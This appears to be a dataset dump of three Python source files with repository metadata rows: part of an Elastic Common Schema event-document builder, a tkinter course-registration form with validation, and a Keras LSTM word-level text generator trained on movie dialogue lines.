        "type": Type,
        "dataset": Dataset,
        "kind": Kind,
        "outcome": Outcome,
        "group": Group,
        "duration": Duration,
    }
    def __init__(self, name, *args, type=None):
        # NOTE(review): the ``type`` keyword is accepted but never used, and
        # ``name`` is forwarded to Base as an ordinary positional field value.
        super().__init__(name, *args)
        # event.original is stored JSON-serialized, not as a structured object.
        if self.get("original"):
            self["original"] = json.dumps(self.get("original"))
class Source(Base):
    """
    Fields about the source side of network connection, used with destination.
    Source fields capture details about the sender of a network
    exchange/packet. These fields are populated from a network event,
    packet, or other event containing details of a network transaction.
    Source fields are usually populated in conjunction with destination
    fields. The source and destination fields are considered the baseline
    and should always be filled if an event contains source and destination
    details from a network transaction. If the event also contains
    identification of the client and server roles, then the client
    and server fields should also be populated.
    """
    _allowed = {
        "address": Address,
        "bytes": Bytes,
        "packets": Packets,
        "port": Port,
        "user": User,
    }
    def __init__(self, *args, **kwargs):
        # Fix: the old code called super().__init__(self, *args, **kwargs),
        # passing the half-built (still empty) instance as a field value --
        # harmless only because Base skips arguments equal to {} -- and
        # forwarding **kwargs although Base.__init__ accepts none. **kwargs
        # stays in the signature for interface compatibility but is ignored.
        super().__init__(*args)
        # Derive source.ip / source.domain from the generic address field.
        address = self.get("address")
        if address:
            try:
                import ipaddress
                self["ip"] = str(ipaddress.ip_address(address))
            except ValueError:
                # Not an IP literal: treat it as a host / domain name.
                self["domain"] = address
class Destination(Source):
    """Destination side of the connection; same fields as Source."""
    pass
class Client(Source):
    """Client role; same fields as Source."""
    pass
class Server(Source):
    """Server role; same fields as Source."""
    pass
class Account(Base):
    _allowed = {"id": Id, "name": Name}
class Region(String):
    """Cloud region field (registered as cloud.region)."""
    pass
class Useragent(Base):
    _allowed = {"original": Original}
# Collection wrappers for the "related" section: variadic constructors that
# drop falsy entries. With no arguments the early return leaves the list
# empty -- the same result the comprehension would have produced.
class IP(list):
    def __init__(self, *vals):
        if not len(vals):
            return
        super().__init__([val for val in vals if val])
class Hash(list):
    def __init__(self, *vals):
        if not len(vals):
            return
        super().__init__([val for val in vals if val])
class Hosts(list):
    def __init__(self, *vals):
        if not len(vals):
            return
        super().__init__([val for val in vals if val])
class Users(list):
    def __init__(self, *vals):
        if not len(vals):
            return
        super().__init__([val for val in vals if val])
class Related(Base):
    _allowed = {"ip": IP, "hash": Hash, "hosts": Hosts, "user": Users}
class Cloud(Base):
    _allowed = {"account": Account, "region": Region}
class Method(String):
    """HTTP request method (http.request.method)."""
    pass
class StatusCode(Int):
    """HTTP response status code (http.response.status_code)."""
    pass
class Version(String):
    """Protocol version string (http.version, tls.version)."""
    pass
class Request(Base):
    """HTTP request sub-document."""
    _allowed = {"method": Method}
class Response(Base):
    """HTTP response sub-document."""
    _allowed = {"status_code": StatusCode}
class HTTP(Base):
    """
    Fields related to HTTP activity. Use the url field set to store the url of
    the request.
    """
    _allowed = {"request": Request, "response": Response, "version": Version}
class URL(Base):
    """
    Fields that let you store URLs in various forms.
    URL fields provide support for complete or partial URLs, and supports the
    breaking down into scheme, domain, path, and so on.
    """
    _allowed = {"original": Original, "path": Path, "query": Query}
class Custom(dict):
    """Free-form "custom" ECS section mapping ``name`` to a coerced value.

    ``type`` selects an explicit coercion (str/bool/float/int); nested
    Custom instances are merged into a sub-dict. If nothing usable is
    supplied, the early return leaves the mapping empty.
    """

    def __init__(self, name, *args, type=None):
        d = {}
        for arg in args:
            if arg is None:
                continue
            if type is str:
                d = str(arg)
            elif type is bool:
                d = bool(arg)
            elif type is float:
                d = float(arg)
            elif type is int:
                d = int(arg)
            elif isinstance(arg, Custom):
                d = {
                    **d,
                    **arg,
                }
            else:
                # Fix: the ``type`` parameter shadows builtins.type here, so
                # calling type(arg) raised TypeError whenever type=None. Read
                # the class attribute directly instead.
                print(f"Unsupported type {name} {arg} {arg.__class__}")
        if d == {}:
            return
        super().__init__({name: d})
class Trace(Base):
    _allowed = {"id": Id}
class Cipher(String):
    """TLS cipher name (registered as tls.cipher)."""
    pass
class TLS(Base):
    _allowed = {"version": Version, "cipher": Cipher}
class ECS(Base):
    """
    The Elastic Common Schema (ECS) is an open source specification, developed
    with support from the Elastic user community. ECS defines a common set of
    fields to be used when storing event data in Elasticsearch, such as logs
    and metrics.
    """
    _allowed = {
        "source": Source,
        "destination": Destination,
        "client": Client,
        "server": Server,
        "event": Event,
        "@timestamp": Timestamp,
        "cloud": Cloud,
        "user_agent": Useragent,
        "error": Error,
        "custom": Custom,
        "related": Related,
        "http": HTTP,
        "url": URL,
        "tls": TLS,
        "trace": Trace,
    }
    def __init__(self, *args, **kwargs):
        # Fix: drop the stray ``self`` argument the old code forwarded to
        # Base.__init__ (skipped only because the still-empty instance
        # compares equal to {}), and stop passing **kwargs, which
        # Base.__init__ does not accept. **kwargs stays in the signature for
        # interface compatibility but is ignored.
        super().__init__(*args)
        # Stamp every document with the schema version it was built against.
        self["ecs"] = {"version": "1.9.0"}
| [
"remco@dutchcoders.io"
] | remco@dutchcoders.io |
990151a9287e7e16c6474fe1ce97cd40525b54d2 | 28af5c332d684c4b0133a1d4a84e091578543918 | /COM220/Trabalho_Final/disciplina.py | d7165921badc8b8a9490962f88bcad1129b2661e | [] | no_license | carloshssouza/UniversityStudies | dac36e3970191358cbaf6cb3db7fb7b82785bbfe | 3142d797cb298da81622cc19ac98fadb3e123af9 | refs/heads/master | 2023-07-25T17:18:40.775832 | 2023-02-02T14:03:19 | 2023-02-02T14:03:19 | 254,239,916 | 7 | 0 | null | 2023-08-30T23:43:47 | 2020-04-09T01:21:27 | C | UTF-8 | Python | false | false | 7,996 | py | import tkinter as tk
from tkinter import ttk
from tkinter import messagebox
import os.path
import pickle
import sys
# Validation errors raised by the controller's form handlers.
class OpcaoVazia(Exception):
    """A required form field was left empty."""
    pass
class CodigoIgual(Exception):
    """The course code is already registered."""
    pass
class NomeIgual(Exception):
    """The course name is already registered."""
    pass
class HorasNegativa(Exception):
    """The workload (carga horaria) is zero or negative."""
    pass
class AnoSemestreIncorreto(Exception):
    """The year/semester label is not of the 'year.semester' form."""
    pass
class CursoNaoCriado(Exception):
    """Presumably raised when no course exists yet (raise site truncated here)."""
    pass
class Disciplina:
    """A course offering: code, name, workload and owning grade (curriculum),
    plus a score and term label filled in later via the add* setters."""
    def __init__(self, codigo, nome, cargaHoraria, grade):
        self.__codigo = codigo              # course code (uniqueness enforced by the controller)
        self.__nome = nome                  # course name (uniqueness enforced by the controller)
        self.__cargaHoraria = cargaHoraria  # workload in hours
        self.__grade = grade                # curriculum ("grade") object this course belongs to
        self.__nota = 0                     # score; 0 until addNota() is called
        self.__anoSemestre = ''             # term label such as "2018.1"; empty until set
    def getCodigo(self):
        return self.__codigo
    def getNome(self):
        return self.__nome
    def getCargaHoraria(self):
        return self.__cargaHoraria
    def getGrade(self):
        return self.__grade
    def getNota(self):
        return self.__nota
    def getAnoSemestre(self):
        return self.__anoSemestre
    def addNota(self, nota):
        # Overwrites the stored score.
        self.__nota = nota
    def addAnoSemestre(self, texto):
        # Overwrites the stored "year.semester" label.
        self.__anoSemestre = texto
class LimiteInsereDisciplinas(tk.Toplevel):
    """Top-level dialog for registering a new course: one labelled entry row
    per field, a grade picker, and Enter/Clear/Done buttons wired to the
    controller's handlers."""
    def __init__(self, controle, listaNomeGrades):
        tk.Toplevel.__init__(self)
        self.geometry('250x150')
        self.title("Disciplina")
        self.controle = controle
        # One frame per form row; packing order (not creation order) defines
        # the vertical layout.
        self.frameNome = tk.Frame(self)
        self.frameCodigo = tk.Frame(self)
        self.frameCargaHoraria = tk.Frame(self)
        self.frameAnoSemestre = tk.Frame(self)
        self.frameGrade = tk.Frame(self)
        self.frameButton = tk.Frame(self)
        self.frameCodigo.pack()
        self.frameNome.pack()
        self.frameCargaHoraria.pack()
        self.frameAnoSemestre.pack()
        self.frameGrade.pack()
        self.frameButton.pack()
        # Labelled text entries, read later by the controller via .get().
        self.labelCodigo = tk.Label(self.frameCodigo,text="Código: ")
        self.labelCodigo.pack(side="left")
        self.inputCodigo = tk.Entry(self.frameCodigo, width=20)
        self.inputCodigo.pack(side="left")
        self.labelNome = tk.Label(self.frameNome,text="Nome: ")
        self.labelNome.pack(side="left")
        self.inputNome = tk.Entry(self.frameNome, width=20)
        self.inputNome.pack(side="left")
        self.labelCargaHoraria = tk.Label(self.frameCargaHoraria, text="Carga Horaria")
        self.labelCargaHoraria.pack(side="left")
        self.inputCargaHoraria = tk.Entry(self.frameCargaHoraria, width=20)
        self.inputCargaHoraria.pack(side="left")
        self.labelAnoSemestre = tk.Label(self.frameAnoSemestre,text="Ano e semestre(ex:2018.1): ")
        self.labelAnoSemestre.pack(side="left")
        self.inputAnoSemestre = tk.Entry(self.frameAnoSemestre, width=20)
        self.inputAnoSemestre.pack(side="left")
        # Grade selection combobox backed by a StringVar.
        self.labelGrade = tk.Label(self.frameGrade,text="Escolha a Grade: ")
        self.labelGrade.pack(side="left")
        self.escolhaCombo = tk.StringVar()
        self.combobox = ttk.Combobox(self.frameGrade, width = 15 , textvariable = self.escolhaCombo)
        self.combobox.pack(side="left")
        self.combobox['values'] = listaNomeGrades
        # Action buttons; the handlers live on the controller object.
        self.buttonSubmit = tk.Button(self.frameButton ,text="Enter")
        self.buttonSubmit.pack(side="left")
        self.buttonSubmit.bind("<Button>", controle.enterHandler)
        self.buttonClear = tk.Button(self.frameButton ,text="Clear")
        self.buttonClear.pack(side="left")
        self.buttonClear.bind("<Button>", controle.clearHandler)
        self.buttonFecha = tk.Button(self.frameButton ,text="Concluído")
        self.buttonFecha.pack(side="left")
        self.buttonFecha.bind("<Button>", controle.fechaHandler)
    def mostraJanela(self, titulo, msg):
        """Show an informational popup with the given title and message."""
        messagebox.showinfo(titulo, msg)
class LimiteMostraDisciplinas():
    """Throwaway view: opens an info dialog listing the disciplinas on construction."""

    def __init__(self, str):
        # `str` shadows the builtin, but renaming it would change the public
        # signature for keyword callers, so it is kept as-is.
        messagebox.showinfo(title='Lista de disciplinas', message=str)
class CtrlDisciplina():
    """Controller for disciplinas: lookup, listing, and the creation dialog.

    Talks to the main controller's `ctrlCurso` and `ctrlGrade` sub-controllers
    and to the `LimiteInsereDisciplinas` / `LimiteMostraDisciplinas` views.
    """

    def __init__(self, controlePrincipal):
        self.ctrlPrincipal = controlePrincipal

    def getDisciplina(self, nome):
        """Return the disciplina named `nome`, or None if absent.

        Names are unique (enterHandler raises NomeIgual on duplicates), so the
        first match is returned immediately.  The leftover debug print that
        was here has been removed.
        """
        for disc in self.ctrlPrincipal.ctrlCurso.getListaDisciplinas():
            if disc.getNome() == nome:
                return disc
        return None

    def getListaCodDisciplinas(self):
        """Return the codes of every registered disciplina."""
        return [disc.getCodigo()
                for disc in self.ctrlPrincipal.ctrlCurso.getListaDisciplinas()]

    def getListaNomeDisciplinas(self):
        """Return the disciplina names known to the grade controller."""
        # NOTE(review): this reads ctrlGrade.getLista() while the other getters
        # read ctrlCurso.getListaDisciplinas() — confirm the asymmetry is intended.
        return [disc.getNome()
                for disc in self.ctrlPrincipal.ctrlGrade.getLista()]

    def insereDisciplinas(self):
        """Open the disciplina-creation dialog, pre-populated with grade names."""
        listaNomeGrades = self.ctrlPrincipal.ctrlGrade.getListaNomeGrades()
        self.limiteIns = LimiteInsereDisciplinas(self, listaNomeGrades)

    def mostraDisciplinas(self):
        """Show every disciplina (code, name, workload, grade) in a dialog."""
        # Local renamed from `str`, which shadowed the builtin.
        texto = 'Código -- Nome -- Carga H\n'
        for disc in self.ctrlPrincipal.ctrlCurso.getListaDisciplinas():
            texto += disc.getCodigo() + ' -- ' + disc.getNome() + f' -- {disc.getCargaHoraria()}\n'
            texto += disc.getGrade().getNome() + '\n\n'
        self.limiteLista = LimiteMostraDisciplinas(texto)

    def enterHandler(self, event):
        """Validate the dialog fields and, if all pass, register the disciplina.

        Validation failures show an alert dialog and leave the form untouched;
        on success the disciplina is added to the matching curso's grade and
        to the grade controller, and the text fields are cleared.
        """
        codigo = self.limiteIns.inputCodigo.get()
        nome = self.limiteIns.inputNome.get()
        cargah = self.limiteIns.inputCargaHoraria.get()
        anoSemestre = self.limiteIns.inputAnoSemestre.get()
        gradeSel = self.limiteIns.escolhaCombo.get()
        # NOTE(review): getGrade may return None if gradeSel is stale; the
        # comparison below would then raise — confirm the combobox guarantees
        # a valid selection whenever gradeSel is non-empty.
        grade = self.ctrlPrincipal.ctrlGrade.getGrade(gradeSel)
        try:
            if codigo == '' or nome == '' or anoSemestre == '' or cargah == '' or gradeSel == '':
                raise OpcaoVazia
            if codigo in self.getListaCodDisciplinas():
                raise CodigoIgual
            if nome in self.getListaNomeDisciplinas():
                raise NomeIgual
            if int(cargah) <= 0:
                raise HorasNegativa
            # anoSemestre must look like "2018.1": exactly one dot with
            # non-empty year and semester parts.
            palavra = anoSemestre.split('.')
            if len(palavra) != 2 or not palavra[0] or not palavra[1]:
                raise AnoSemestreIncorreto
            if len(self.ctrlPrincipal.ctrlCurso.listaCursos) == 0:
                raise CursoNaoCriado
        except OpcaoVazia:
            self.limiteIns.mostraJanela('Alerta', 'Campo vazio')
        except CodigoIgual:
            self.limiteIns.mostraJanela('Alerta', 'Codigo já existente')
        except NomeIgual:
            self.limiteIns.mostraJanela('Alerta', 'Nome já existente')
        except HorasNegativa:
            self.limiteIns.mostraJanela('Alerta', 'Horas negativas ou zeradas não são permitidas')
        except AnoSemestreIncorreto:
            self.limiteIns.mostraJanela('Alerta', 'Digite como mostrado no exemplo')
        except CursoNaoCriado:
            self.limiteIns.mostraJanela('Alerta', 'É necessario criar um curso antes de adicionar')
        else:
            # Attach the new disciplina to every curso that uses the chosen grade.
            for curso in self.ctrlPrincipal.ctrlCurso.listaCursos:
                if curso.getGrade().getNome() == grade.getNome():
                    disciplina = Disciplina(codigo, nome, int(cargah), grade)
                    disciplina.addAnoSemestre(anoSemestre)
                    curso.getGrade().addDisciplina(disciplina)
                    self.ctrlPrincipal.ctrlGrade.addDisciplina(disciplina)
            self.limiteIns.mostraJanela('Sucesso', 'Disciplina cadastrada com sucesso')
            self.clearHandler(event)

    def clearHandler(self, event):
        """Clear the code, name and workload fields of the dialog.

        NOTE(review): anoSemestre and the grade combobox are deliberately (?)
        left untouched — confirm.
        """
        self.limiteIns.inputCodigo.delete(0, tk.END)
        self.limiteIns.inputNome.delete(0, tk.END)
        self.limiteIns.inputCargaHoraria.delete(0, tk.END)

    def fechaHandler(self, event):
        """Close the disciplina-creation dialog."""
        self.limiteIns.destroy()
| [
"carlossouza_94@hotmail.com"
] | carlossouza_94@hotmail.com |
8f94a6f2dfd570da54c01803c2536171634418e5 | 4b5a19fab3304aeb617f24f6bc4f7ffb9ccbbd93 | /ml/textGen.py | 531b9ed5aabe6e12a97038bd980b550529edaaae | [] | no_license | Harvard-Jahseh/Impressionator | a0878d022c615334d05d2106479a98ca57e8b9e0 | a1069e76c83df7a1da5ef4a7baf8a0216e00e1cb | refs/heads/master | 2022-12-14T19:30:41.453482 | 2019-09-14T20:35:28 | 2019-09-14T20:35:28 | 208,361,583 | 1 | 0 | null | 2022-12-11T05:47:36 | 2019-09-13T23:20:28 | Python | UTF-8 | Python | false | false | 4,243 | py |
from keras.models import Sequential
from keras.layers import LSTM, Embedding, Dense, Dropout
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
from keras.callbacks import ModelCheckpoint
import keras.utils as ku
# Adapted from:
#https://github.com/shivsondhi/Text-Generator/blob/master/textGenerator_words.py
# Seed the TensorFlow and NumPy RNGs up front so training and generation
# runs are reproducible.
from tensorflow import set_random_seed
from numpy.random import seed
set_random_seed(2)
seed(1)
import pandas as pd
import numpy as np
import string, os, csv, random
def get_sequence_of_tokens(corpus, tokenizer):
    """Fit `tokenizer` on `corpus` and build n-gram prefix training sequences.

    Each line of `corpus` yields len(tokens)-1 growing prefixes:
    [w0, w1], [w0, w1, w2], ...  The last element of each prefix serves as
    the prediction label downstream.

    Returns (input_sequences, total_words), where total_words is the
    vocabulary size + 1 (keras reserves index 0 for padding).
    """
    # BUG FIX: the original called the module-level tokenizer `t` here
    # (t.fit_on_texts / t.texts_to_sequences) instead of the `tokenizer`
    # parameter, which defeated the point of passing one in.
    tokenizer.fit_on_texts(corpus)
    total_words = len(tokenizer.word_index) + 1  # word_index maps word -> int id
    input_sequences = []
    for line in corpus:
        token_list = tokenizer.texts_to_sequences([line])[0]
        for i in range(1, len(token_list)):
            input_sequences.append(token_list[:i + 1])
    return input_sequences, total_words
def get_padded_sequences(input_sequences, total_words):
    """Pre-pad the n-gram sequences to a uniform length and split X from y.

    Returns (predictors, label, max_sequence_len): predictors are all but the
    last token of each padded sequence; label is the last token, one-hot
    encoded over the vocabulary.
    """
    max_sequence_len = max(len(seq) for seq in input_sequences)
    padded = np.array(pad_sequences(input_sequences,
                                    maxlen=max_sequence_len,
                                    padding='pre'))
    # Last column is the target word; everything before it is the input.
    predictors = padded[:, :-1]
    label = ku.to_categorical(padded[:, -1], num_classes=total_words)
    return predictors, label, max_sequence_len
def create_model(max_sequence_len, total_words):
    """Build and compile a small word-level language model.

    Embedding -> single 5-unit LSTM -> dropout -> softmax over the vocabulary.
    Inputs are the (max_sequence_len - 1)-token predictors produced by
    get_padded_sequences.
    """
    model = Sequential([
        Embedding(total_words, 10, input_length=max_sequence_len - 1),
        LSTM(5),
        Dropout(0.1),
        Dense(total_words, activation='softmax'),
    ])
    model.compile(optimizer='adam', loss='categorical_crossentropy')
    return model
def generate_text(tokenizer, seed_text, next_words, model, max_sequence_len):
    """Extend `seed_text` by `next_words` words predicted one at a time.

    Each step tokenizes the running text, pre-pads it to the model's input
    length, predicts the next word id, and appends the matching word.
    Returns the extended text.
    """
    # Build the id -> word reverse map once, instead of scanning
    # tokenizer.word_index on every generated word (the original did an
    # O(vocab) linear search per step, and also left a debug print behind).
    index_to_word = {index: word for word, index in tokenizer.word_index.items()}
    for _ in range(next_words):
        token_list = tokenizer.texts_to_sequences([seed_text])[0]
        token_list = pad_sequences([token_list], maxlen=max_sequence_len - 1, padding='pre')
        predicted = model.predict_classes(token_list, batch_size=2)
        # predict_classes returns a length-1 array; int() normalizes it.
        # Unknown ids fall back to "" exactly as the original loop did.
        output_word = index_to_word.get(int(predicted), "")
        seed_text += " " + output_word
    return seed_text
# ---- Script body: load dialogue lines, train (optionally), and generate. ----

text_sequences = []
# NOTE(review): `mode` is set but never consulted below — the train/generate
# switch appears to be unfinished.
modes = ['train', 'generate', 'retrain', 'none']
mode = modes[1]
# NOTE(review): 0 epochs means model.fit below is effectively a no-op and the
# checkpoint file must already exist for load_weights to succeed.
num_epochs = 0
# Read up to ~10k utterances (column 5) from the Cornell movie-lines TSV.
with open("./movie_lines.tsv",) as tsvfile:
    reader = csv.reader(tsvfile, delimiter='\t')
    count = 0
    for row in reader:
        if len(row) < 5:
            continue
        else:
            text_sequences.append(row[4])
        count += 1
        if count > 10000:
            break
#print(len(text_sequences))
# Tokenize, build padded n-gram sequences, and construct the model.
t = Tokenizer()
input_sequences, total_words = get_sequence_of_tokens(text_sequences, t)
predictors, label, max_sequence_len = get_padded_sequences(input_sequences, total_words)
model = create_model(max_sequence_len, total_words)
# Checkpoint the lowest-loss weights during training.
savepath = "model_weights.hdf5"
checkpoint = ModelCheckpoint(savepath, monitor="loss", verbose=1, save_best_only=True, mode="min")
callbacks_list = [checkpoint]
model.fit(predictors, label, epochs=num_epochs, verbose=1, callbacks=callbacks_list)
# Reload the best checkpointed weights before generating.
best_file = "model_weights.hdf5"
model.load_weights(best_file)
# NOTE(review): `verbose` is not a documented argument of model.compile in
# modern Keras — confirm this works on the pinned Keras version.
model.compile(loss='categorical_crossentropy', optimizer='adam', verbose = 1)
print("compiling")
# Generate a continuation of random length for each seed phrase.
seed_texts = ['We should',"Do that"]
i = 1
for seed_text in seed_texts:
    print("Seed {0}".format(i))
    next_words = random.randint(6, max_sequence_len)
    generated_headline = generate_text(t, seed_text, next_words, model, max_sequence_len)
    print(generated_headline, end="\n\n")
    i += 1
| [
"zheng.harvey5@gmail.com"
] | zheng.harvey5@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.